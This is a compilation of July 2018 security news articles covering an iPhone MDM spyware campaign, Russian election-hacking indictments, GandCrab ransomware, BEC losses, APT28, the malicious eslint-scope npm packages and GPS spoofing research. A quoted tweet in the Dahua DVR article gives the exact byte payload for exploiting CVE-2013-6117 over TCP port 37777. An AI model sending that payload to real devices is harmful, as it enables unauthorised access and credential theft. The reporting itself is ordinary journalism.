Enterprise can deliver MDM configuration file through email or a webpage for over-the-air enrollment service using the Apple Configurator.

“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.

Cisco’s Talos experts believe that attackers used either social engineering techniques, such as a fake tech support-style call or gaining in some way a physical access to the targeted devices.

The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code to legitimate apps, including the messaging apps WhatsApp and Telegram that were then deployed through the MDM service onto the 13 targeted devices in India.

The BOptions sideloading technique allowed the attacker to inject a dynamic library in the application that implements spyware capabilities. The malicious code allows that attacker of collecting and exfiltrating information from the targeted device, including the phone number, serial number, location, contacts, user’s photos, SMS and Telegram and WhatsApp chat messages.

It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.

Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com

Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.

“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.

“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”

Talos was not able to attribute the attack to a specific actor either which are its motivations, they were only able to find evidence suggesting the attackers were operating from India. Experts noticed that attackers planted a “false flag” by posing as a Russian threat actor.

“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.

Talos shared its findings with Apple that quickly revoked 3 certificates used in this campaign.

Further details, including IoCs are reported in the analysis shared by Talos.


12 Russian Intel Officers charged of hacking into U.S. Democrats
19.7.2018 securityaffairs BigBrothers

The week closes with the indictment for twelve Russian intelligence officers by a US grand jury. The charges were formulated just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
The special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, now charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“there’s no allegation in this indictment that any American citizen committed a crime.” said Rosenstein. “the conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers,”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, the agents used payment with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General, confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The minority at the US Government is pressing Trump to cancel the meeting with Putin because he intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,”

Russian intelligence

The White House

@WhiteHouse
At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."

10:03 PM - Jul 13, 2018
8,718
5,186 people are talking about this
Twitter Ads info and privacy
Russian intelligence
Hillary Clinton and Donald Trump are tightening their grips on the Democratic and Republican presidential nominations.

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, there was at least a person close to the Trump campaign and a candidate for Congress that in contact the Russians officers.


A few days after discovery of GandCrab ransomware ver 4.0, experts found 4.1 version
19.7.2018 securityaffairs
Ransomware

Security experts from Fortinet recently detected a new version of the GandCrab ransomware, ver 4.1, that is being distributed through compromised websites
A few days ago, I wrote about the return of the GandCrab ransomware (v4), a new version appeared in the threat landscape and experts at BleepingComputer first reported it.

GandCrab ransomware is a young threat, it first appeared in the wild early this year, but rapidly evolved and it authors improves it across the months. As of March, the ransomware had infected over 50,000 systems and netted its operators over $600,000 in ransom payments.
Security experts from Fortinet recently detected a new version of the threat, the GandCrab ransomware 4.1 that is being distributed through compromised websites designed to appear like download sites for cracked applications.

As the GandCrab ransomware 4 version, the new variant uses the Salsa2.0 stream cipher to encrypt data instead of the RSA-2048 encryption that was used in early versions of the threat.

The code of the latest variant 4.1 includes a list of websites to which the malware connects to sends data related to the infected machine (i.e. IP address, username, computer name, network domain, and, if present, a list of anti-malware tools on the system).

“Only two days after the release of GandCrab 4.0, FortiGuard Labs found a newer version (v4.1) being distributed using the same method, which is through compromised websites disguised as download sites for cracked applications.” reads the analysis published by Fortinet.

“With this new version, GandCrab has added a network communication tactic that was not observed in the previous version.”

gandcrab ransomware

Why does the new variant send data to a large number of websites?

According to Fortinet, there is no evidence that those websites in the hard-coded list have actually been compromised, this circumstance suggests the authors of the malware are testing the functionality or have put it there as a diversionary tactic.

“However, we found no definitive evidence that the hard-coded websites included in the malware had actually ever been compromised to act as servers or download sites for GandCrab.” continues the analysis.

“Even more curious, the fact is that sending victim information to all live hosts in the list is illogical in a practical sense, given that a single successful send would have been enough for its purposes. With these points in mind, we have started to think that this function is either experimental, or simply there to divert analysis and that the URLs included in the list are just victims of a bad humour.”

The analysis of the ransomware revealed that the GandCrab ransomware 4.1 kills numerous processes that can interfere with the file encryption process. For example, it kills msftesql.exe, sqlagent.exe, oracle.exe, msaccess.exe, powerpnt.exe, and wordpad.exe to encrypt high-value files used by most popular applications, such as Microsoft Office Files, Steam, Oracle, etc.

The experts from Fortinet highlighted that there is no evidence that the GandCrab ransomware 4.1 is also able to spread via SMB shares, such as WannaCry and Petya/NotPetya.

“Over the past few days, numerous reports have been circulating claiming that this version of the GandCrab malware can self-propagate via an “SMB exploit”” continues the analysis.

GandCrab ransomware 4

“However, in spite of this string, we could not find any actual function that resembles the reported exploit capability. (It may also be relevant to report that this string was actually first found in v4.0 and not in v4.1, at least in the samples that we have analysed.) Since this string is not connected to any actual exploit spreading function that we could uncover, it seems much more likely that it is simply referring to the encryption of network shares, and not for any sort of exploit propagation.”

Summarizing the threat continues to evolve, but it can not spread via SMB shares yet.


FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 result in $12 billion
19.7.2018 securityaffairs BigBrothers

The number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
FBI provided further data related to Email Account Compromise, according to the feds, the number of business email account (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large business and personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 result in $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058 resulting in $2.9 billion in losses. Feds highlighted that most of the fraudulent activities leveraged on China and Hong Kong banks as receipt of fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on the organizations in the real estate industry, from 2015 to 2017, there was an increase of 1,100% of BEC/EAC victims.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals.” continue the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below the BEC/EAC statistics that were shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299
The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 2018:
Total U.S. victims: 41,058
Total U.S. victims: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009
The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 20163. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:
Total U.S. financial recipients: 19,335
Total U.S. financial recipients: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278
FBI BEC
According to a report published by TrendMicro published in January 2018, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018.8.


Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.2018 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, he added that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” reported the CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempts of hacking of “old emails” of the Republican National Committee was first reported by the CNN in January last year when it quoted the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”


Update CSE Malware ZLab – Operation Roman Holiday – Hunting the Russian APT28
19.7.2018 securityaffairs APT

Researchers from the Z-Lab at CSE Cybsec analyzed a new collection of malware allegedly part of a new espionage campaign conducted by the APT28 group.
It was a long weekend for the researchers from the Z-Lab at CSE Cybsec that completed the analysis a number of payloads being part of a new cyber espionage campaign conducted by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

Last time experts attributed an ongoing campaign to APT28 was in June, when experts from Palo Alto Networks noticed that the group was using new tools in a recent string of attacks.

Palo Alto Networks explained t the APT group has shifted focus in their interest, from NATO member countries and Ukraine to towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

While conducting ordinary threat intelligence activities, experts at Z-Lab at CSE Cybsec have recently discovered a new series of malware samples that were submitted to the major online sandboxes.

In particular, they noticed a malware sample submitted to Virus Total that was attributed by some experts to the Russian APT28 group.

The APT28 group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

With the help of the researcher that goes online with the Twitter handle Drunk Binary (@DrunkBinary) researchers from Z-Lab obtained a collection of samples to compare with the one that was uploaded on VirusTotal platform.

The analysis revealed that it was a new variant of the infamous APT28 backdoor tracked as X-Agent, in particular, a new Windows version that appeared in the wild in June,

The attack analyzed CSE Cybsec is multi-stage, the experts discovered an initial dropper malware written in Delphi programming language (a language used by the APT28 group in other campaigns) downloads a second stage payload from the Internet and executes it.

APT28 Roman Holiday.png

The payload communicates to the server using HTTPS protocol, making it impossible to eavesdrop on the malicious traffic it generates.

The experts also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group.

This malware immediately caught the attention of the expert because it contacts a C2 with the name “marina-info.net” a clear reference to the Italian Military corp, Marina Militare. This lead them into believing that the malicious code was developed as part of targeted attacks against the Italian Marina Militare, or some other entities associated with it.

This last DLL seems to be completely unconnected with the previous samples, but further investigation leads the experts into believing that it was an additional component used by APT28 in this campaign to compromise the target system.

APT28 has a rich arsenal composed of a large number of modular malware and the dll is the component of the X-Agent dissected by the Z-Lab.

X-Agent is a persistent payload injected into the victim machine that can be compiled for almost any Operating System and can be enhanced by adding new ad-hoc component developed for the specific cyber-attack.

In this case, the component was submitted to online sandboxes while the new campaign was ongoing. The experts cannot exclude that the APT group developed the backdoor to target specific organizations including the Italian Marina Militare or any other subcontractor. In their analysis, the experts were not able to directly connect the malicious dll file to the X-Agent samples, but they believe they are both parts of a well-coordinated surgical attack powered by APT28 tracked by Z-Lab as Roman Holiday because it targeted Italian organizations in the summertime.

The dll that connect to “marina-info.net” might be the last stage-malware that is triggered only when particular conditions occur, for example when the malware infects a system with an IP address belonging to specific ranges.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.


ZoomEye IoT search engine cached login passwords for tens of thousands of Dahua DVRs
19.7.2018 securityaffairs IoT

A security researcher discovered that the IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs.
The IoT search engine ZoomEye has cached login passwords for tens of thousands of Dahua DVRs, the discovery was made by security researcher Ankit Anubhav, Principal Researcher at NewSky Security.

Dahua DVRs

Anubhav explained that the passwords are related to Dahua DVRs running very old firmware that is known to be affected by a five-year-old vulnerability tracked as CVE-2013-6117.

Even if the vulnerability has been patched, many Dahua devices are still running ancient firmware.

The CVE-2013-6117 was discovered by the security expert Jake Reynolds and affects Dahua DVR 2.608.0000.0 and 2.608.GV00.0. The flaw could be exploited by remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777.

An attacker just needs to initiate a raw TCP connection on a vulnerable Dahua DVR on port 37777 to send the exploit code that triggers the issue.

Once the Dahua device receives this code, it will respond with DDNS credentials for accessing the device, and other data, all in plaintext.

Ankit Anubhav
@ankit_anubhav
Just to make things clear to weaponize the exploit, one needs to connect to port 37777 on raw TCP + send the following message to get the ddns creds

"\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

Ankit Anubhav
@ankit_anubhav
Wow and how did I miss this.
13900+ of these devices have their password as "123456"
Check here https://goo.gl/S5G2Bh #iot #security #fail

This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices. https://twitter.com/ankit_anubhav/status/1017429425602822144 …

11:49 PM - Jul 13, 2018
51
31 people are talking about this
Twitter Ads info and privacy

Ankit Anubhav
@ankit_anubhav
Wow and how did I miss this.
13900+ of these devices have their password as "123456"
Check here https://goo.gl/S5G2Bh #iot #security #fail

This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices.

Ankit Anubhav
@ankit_anubhav
Replying to @ankit_anubhav
And of course, people here too have not failed to put extremely generic passwords.https://www.zoomeye.org/searchResult?q=%2Bport%3A%2237777%22%20%22admin123%22 … 270 devices have password as "admin123" lol.

Brickerbot is known to brick the devices he pwns, so it does not look like a happy ending for these devices. @GDI_FDN <end>

8:21 PM - Jul 13, 2018
16
See Ankit Anubhav's other Tweets
Twitter Ads info and privacy
Anubhav explained that ZoomEye scans port 37777 caching the output in plaintext, this means that everyone that with a ZoomEye account can scrap results to obtain the credentials of tens of thousands

Anubhav notified the issue to ZoomEye asking it to remove the passwords from its cached results, but the expert is still waiting for a reply.

The expert explained that he discovered the issue after reading a post published by the author of the BrickerBot IoT malware that exploited the flaw to hacked hijack and brick Dahua DVRs in the past.


Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.2018 securityaffairs BigBrothers

The Director of the National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, he used the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attacker, the number of their attacks continue to increase and the level of sophistication is growing too.

US infrastructure threat

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it. On Friday, the special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned of threat a “crippling cyber attack on our critical infrastructure” by a nation state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” reported the Reuters.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He made a parallelism on the current situation in the cyberspace with the “alarming activities” that U.S. intelligence detected before al Qaeda conducted Sept. 11, 2001 attack.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency based in the St. Petersburg that was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.


Code hosting service GitHub can now scan also for vulnerable Python code
19.7.2018 securityaffairs
Vulnerebility

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.
Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed obtaining a significant reduction of vulnerable code libraries on the platform.

Github alerts warn developers when including certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company announced to add the support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. Github notified affected users by December 1, more than 450,000 of the vulnerabilities were addressed either by updating the affected library or removing it altogether.

Vulnerabilities are in a vast majority of cases addressed within a week by active developers.

With the support of a Python language, developers will have the opportunity to receive alerts also for their code written in this powerful programming language.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories the maintainers need to opt into security alerts, or by giving the dependency graph access to the repo from the “Insights” tab.

“Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allow access in the dependency graph section of your repository’s “Insights” tab.” concludes Schultheis.

“When vulnerability alerts are enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts by going into their repository’s settings page and navigating to the “Alerts” tab.”


Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.2018 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, but as expected Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump made a joint news conference and of course, the US President Trump confirmed its trust in the words of the ally Putin.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about alleged Russia’s interference in the 2016 Presidential election, his investigation led to the indictment of 12 Russian intelligence officials working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election, this is the Trump’s though.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between campaigns launched by China and Russian ones.

According to Coats, China operates with the primary intent on stealing military and industrial secrets and had “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin operated to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

Trump Putin
HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below the excerpt from the full transcript from the Helsinki press conference about alleged interference in 2016 Presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.


Crooks deployed malicious ESLint packages that steal software registry login tokens
19.7.2018 securityaffairs
Virus

Hackers compromised the npm account of an ESLint maintainer and published malicious versions of eslint packages to the npm registry.
Crooks compromised an ESLint maintainer’s account last week and uploaded malicious packages that attempted to steal login tokens from the npm software registry. npm is the package manager for JavaScript and the world’s largest software registry.

ESLint is open source “pluggable and configurable linter tool” for identifying and reporting on patterns in JavaScript, it was created by Nicholas Zakas.

The affected packages hosted on npm are:

eslint-scope version 3.7.2 o, a scope analysis library used by older versions of eslint, and the latest versions of babel-eslint and webpack.
eslint-config-eslint version 5.0.2 is a configuration used internally by the ESLint team.
Once the tainted packages are installed, they will download and execute code from pastebin.com that was designed to grab the content of the user’s .npmrc file and send the information to the attacker. This file usually contains access tokens for publishing to npm.

“The attacker modified package.json in both eslint-escope@3.7.2 and eslint-config-eslint@5.0.2, adding a postinstall script to run build.js. This script downloads another script from Pastebin and evals its contents.” wrote Henry Zhu about the eslint-scope attack.

“The script extracts the _authToken from a user’s .npmrc and sends it to histats and statcounter inside the Referer header,”

The packages were quickly removed once they were discovered by maintainers and the content on pastebin.com was taken down.

“On July 12th, 2018, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the user’s .npmrc file to the attacker.” reads the security advisory published by ESLint.

“An .npmrc file typically contains access tokens for publishing to npm. The malicious package versions are eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, both of which have been unpublished from npm. The pastebin.com paste linked in these packages has also been taken down.”

ESLint packages

The npm login tokens grabbed by malicious packages don’t include user’s npm password, but npm opted to revoke possibly impacted tokens. Users can revoke existing tokens as suggested by npm.

“We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.” reads the npm’s incident report.

Further investigation allowed the maintainers to determine that the account was compromised because the ower had reused the same password on multiple accounts and also didn’t enabled two-factor authentication on their npm account.

ESLint released eslint-scope version 3.7.3 and eslint-config-eslint version 5.0.3.

Users who installed the malicious packages need to update npm.


Researchers show how to manipulate road navigation systems with low-cost devices
19.7.2018 securityaffairs Mobil

Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers and manipulate road navigation systems.
Researchers have developed a tool that poses as GPS satellites to deceive nearby GPS receivers. The kit could be used to deceive receivers used by navigation systems and suggest drivers the wrong direction.

“we explore the feasibility of a stealthy manipulation attack against road navigation systems. The goal is to trigger the fake turn-by-turn navigation to guide the victim to a wrong destination without being noticed.” reads the research paper published by the experts.

“Our key idea is to slightly shift the GPS location so that the fake navigation route matches the shape of the actual roads and trigger physically possible instructions.”

The group of researchers is composed of three teams from Microsoft, Virginia Tech in the US, and the University of Electronic Science and Technology of China.

The boffins were able to spoof packets transmitted by satellites to mobile devices and navigation systems used in the automotive industry.

The tests conducted by experts allowed to remotely change the routes with up to 95 per cent accuracy. The researchers built a radio-transmitting device based on Raspberry Pi, they used just $223 of components.

The radio transmitting device broadcasts fake location data and makes it impossible for the receivers to have the real positioning data from the satellite.

In a Real attack scenario, the device could be used to deceive navigation systems in cars.

navigation systems

“We show that adversaries can build a portable spoofer with low costs (about $223), which can easily penetrate the car body to take control of the GPS navigation system.” continues the paper.

“Our measurement shows that effective spoofing range is 40–50 meters and the target device can consistently latch onto the false signals without losing connections,”

In order to make the attack stealth the researchers experimented with stashing the spoofing device in the trunk of a car or under the back seat.

They were able to add new route details via a cellular network connection without following the target.

In a test in field conducted in a Chinese parking lot, the researchers deceived a navigation system in 48 seconds by hiding the device in the truck, while if it was under the seat, it took just 38 seconds.

The expert used data from OpenStreetMap to construct routes the target.
“Compared to spoofing a drone or a ship, there are unique challenges to manipulate the road navigation systems. First, road navigation attack has strict geographical constraints. It is far more challenging to perform GPS spoofing attacks in real-time while coping with road maps and vehicle speed limits.” continues the paper.

“In addition, human drivers are in the loop of the attack, which makes a stealthy attack necessary.”

